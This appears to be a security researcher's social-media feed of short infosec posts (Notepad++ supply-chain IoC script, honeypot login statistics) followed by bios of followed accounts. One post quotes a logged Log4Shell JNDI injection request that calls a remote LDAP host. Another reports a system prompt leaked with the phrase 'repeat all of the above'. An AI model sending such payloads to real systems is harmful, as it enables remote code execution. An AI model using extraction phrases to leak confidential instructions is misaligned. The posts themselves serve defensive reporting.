Released a PowerShell IoC triage script for detecting the Notepad++ supply chain attack, including the previously known @rapid7.com IoCs and now the newly released IoCs for chains 1 (ProShow) & 2 (Lua/Adobe) published by Securelist/Kaspersky:
github.com/moltenbit/No...
#cybersecurity
04.02.2026 10:54 β π 0 π 0 π¬ 0 π 0
Released a PowerShell IoC triage script for detecting the Notepad++ supply chain attack, including the previously known @rapid7.com IoCs and now the newly released IoCs for chains 1 (ProShow) & 2 (Lua/Adobe) published by @kasperskylab.bsky.social :
github.com/moltenbit/No...
#cybersecurity
04.02.2026 10:53 β π 0 π 0 π¬ 0 π 0
confer.to system prompt has already been leaked by "repeat all of the above"
#security #ai #llm #cybersecurity
15.01.2026 18:29 β π 0 π 0 π¬ 0 π 0
If your website asks for a 2FA code but doesn't automatically select the input field, I'm judging your entire engineering team.
22.12.2025 09:06 β π 0 π 0 π¬ 0 π 0
#sysadmin #cybersecurity #infosec
09.12.2025 14:55 β π 0 π 0 π¬ 0 π 0
[!] FILE: /var/log/[redacted]/2021_12_13.request.log LINE_NUMBER: 8 DEOBFUSCATED_STRING: ${jndi:ldap: LINE: [remote-server01] - - [13/Dez/2021:02:02:36 +0000] "GET https://[local-server01]/$%7Bjndi:ldap://[remote-server01]:1389/Exploit%7D HTTP/1.1" 404 277
Dec 2021 in one line.
#sysadmin #infosec
25.11.2025 16:18 β π 1 π 1 π¬ 0 π 0
do you have any IoCs published? I have reason to believe this campaign started earlier than October. I know of an incident from September 8th, which looks just like this. I can send you some IoCs if youβre interested.
25.11.2025 12:42 β π 0 π 0 π¬ 0 π 0
moltenbit - IT, cybersecurity, OSINT & more...
moltenbit.net - IT, cybersecurity, OSINT & more...
π Honeypot Login Attempts (24h):
π€ Usernames:
root (1,547), admin (203), oracle (71), user (47)
π Passwords:
1 (1,417), 123456 (282), 123 (174), abc123 (54)
π moltenbit.net
#infosec #honeypot #cybersecurity
03.06.2025 17:20 β π 0 π 0 π¬ 0 π 0
honeypot 24h most tested usernames
#cybersecurity #infosec #security #honeypot
02.06.2025 07:40 β π 0 π 0 π¬ 0 π 0
Funnull enabled large-scale crypto scams by leasing IP space + hosting 332K+ fast-flux domains across AWS, Azure, and others. FBI calls this βinfrastructure laundering.β. IOCs can be found here: www.ic3.gov/CSA/2025/250... via @briankrebs.infosec.exchange.ap.brid.gy
30.05.2025 07:27 β π 0 π 0 π¬ 0 π 0
VirusTotal
VirusTotal
Interesting that @crowdstrike.com Falcon doesn't detect the EICAR test file on VirusTotal.
www.virustotal.com/gui/file/275...
#infosec #malware #cybersecurity
28.05.2025 11:07 β π 0 π 0 π¬ 0 π 0
#microsoft #outlook still using #windows xp style recycle bin icon when deleting mails seems wild to me
28.05.2025 08:46 β π 0 π 0 π¬ 0 π 0
If you load this page it contacts 82 IP addresses executing 256 separate HTTP transactions to download 18MB of data writing 64 cookies to your device to tell you βnoβ
24.05.2025 10:37 β π 14988 π 4476 π¬ 148 π 241
Rapid7 can help you command your attack surface, smash silos, stay steps ahead of attackers, and take breaches from βinevitableβ to preventable. Rapid7 technology, services, and research give organizations around the world control.
π: rapid7.com
Just a passionate dev, learning from this community daily.
β¨ Sharing the entire journey - bugs, breakthroughs, and banter. π
I stare at logs so they donβt stare back at you.
One real log line every day: Linux, Windows, firewalls, switches, SaaS.
Scrubbed of IPs, names and other sins.
BlackFog is an AI based cybersecurity company that focuses on stopping ransomware using anti data exfiltration or ADX.
Investigativer Journalist @netzpolitik.org. MitgrΓΌnder @freiheitsrechte.org und digitalegesellschaft.de. Beobachter edri.org. Beirat @cdteu.org. Mitglied @ccc.de. Freund @fragdenstaat.de. Lieber auf https://chaos.social/@andre_meister.
Our mission is to make the Internet more secure by bringing to light vulnerabilities, malicious activity and emerging threats. Join our Alliance!
https://shadowserver.org/partner
RΓ©dac' chef de LeMagIT (fr)
Accro #cybersΓ©curitΓ© #infosec
Collectionneur de #ransomware
follow: https://linktr.ee/valerymarchive
official CrowdStrike account (check domainπ)
The first cloud-native platform that protects endpoints and cloud workloads, identity & data. #WeStopBreaches. Free trial: http://crwdstr.ke/tryfalcon
it's a website (and a podcast, and a newsletter) about humans and technology, made by four journalists you might already know. like and subscribe: 404media.co
Hacker (the good kind[mostly]). Breaking things, fixing them, then breaking them again. AI, robotics, honeypots, and whatever else keeps me up at night
https://github.com/Rat5ak
https://medium.com/@Nadsec
https://x.com/Nadsec11
China-Focused Consultant @SentinelOne | Nonresident Fellow @ACGlobalChina | Adjunct @Georgetown | Unprofessional Cook | β€οΈππ
https://linktr.ee/dakotaindc
Nukes, weird tech, and conflict at @404media.co Host of angryplanetpod.com
Tips: matthew@404media.co // signal: 347 762-9212
Cybersecurity/tech reporter @BleepingComputer / serghei.ro
We are Microsoft's global network of security experts. Follow for security research and threat intelligence. https://aka.ms/threatintelblog
Creator of Have I Been Pwned. Microsoft Regional Director. Pluralsight author. Online security, technology and βThe Cloudβ. Australian.
GreyNoise analyzes Internet background noise. Use GreyNoise to remove pointless security alerts, find compromised devices, or identify emerging threats.
Ransomware, Online Security, and Malware. Owner, Editor in Chief of @bleepingcomputer.com
DM on Signal: LawrenceA.11 * Telegram: lbleeper * http://infosec.exchange/@lawrenceabrams
We're a nonprofit defending your privacy and freedom online. Download Tor Browser for protection against surveillance and censorship. http://t.me/TorProject
Breaking cybersecurity and technology news, guides, and tutorials that help you get the most from your computer. DMs are open, so send us those tips!
Cybersecurity correspondent at Reuters; former Mother Jones, CyberScoop. Will bore you with skateboarding, UFO lore or Denver Broncos minutiae on request. Signal: ajvicens.57, additional contact methods: https://tinyurl.com/47jc45h7
